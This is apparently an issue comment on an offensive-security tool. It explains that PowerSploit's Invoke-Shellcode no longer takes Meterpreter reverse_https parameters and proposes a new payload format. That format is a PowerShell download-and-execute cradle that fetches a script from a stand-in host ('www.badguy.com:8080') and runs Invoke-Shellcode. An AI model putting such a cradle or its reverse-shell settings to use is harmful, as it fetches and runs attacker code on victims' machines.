Invoke-Shellcode
Thanks for the fixes in #113 - huge thanks to @jmingov in particular. Unfortunately "-Payload windows/meterpreter/reverse_https -Lhost 192.168.1.19 -Lport 4457" are no longer parameters of Invoke-Shellcode. It only takes a -Shellcode
, -ProcessId
, and -Force
. I attempted to use an older version of Invoke-Shellcode but unfortunately while it did work, the updated version of Metasploit no longer accepts the payload built into them.
So my suggestions would be:
- Remove the "LHOST" and "LPORT" options in the app itself as it really doesn't serve a purpose now since you cant actually change that option anymore
- Change
URL to Payload
(just the text) in the app, toURL to Invoke-Shellcode.ps1
so that it's clearer what is happening/needed. - Make the payload look like this:
iex (New-Object Net.WebClient).DownloadString("www.badguy.com:8080"); Invoke-Shellcode -Force
wherewww.badguy.com:8080
is the URL from theURL to Payload
option as it is now.
The other option is to make it much more generic and just have the URL option and tell them it needs to be an executable powershell script and then the only thing you need to worry about is "URL to Payload" and plug it into the DownloadString.
Edited by Ghost User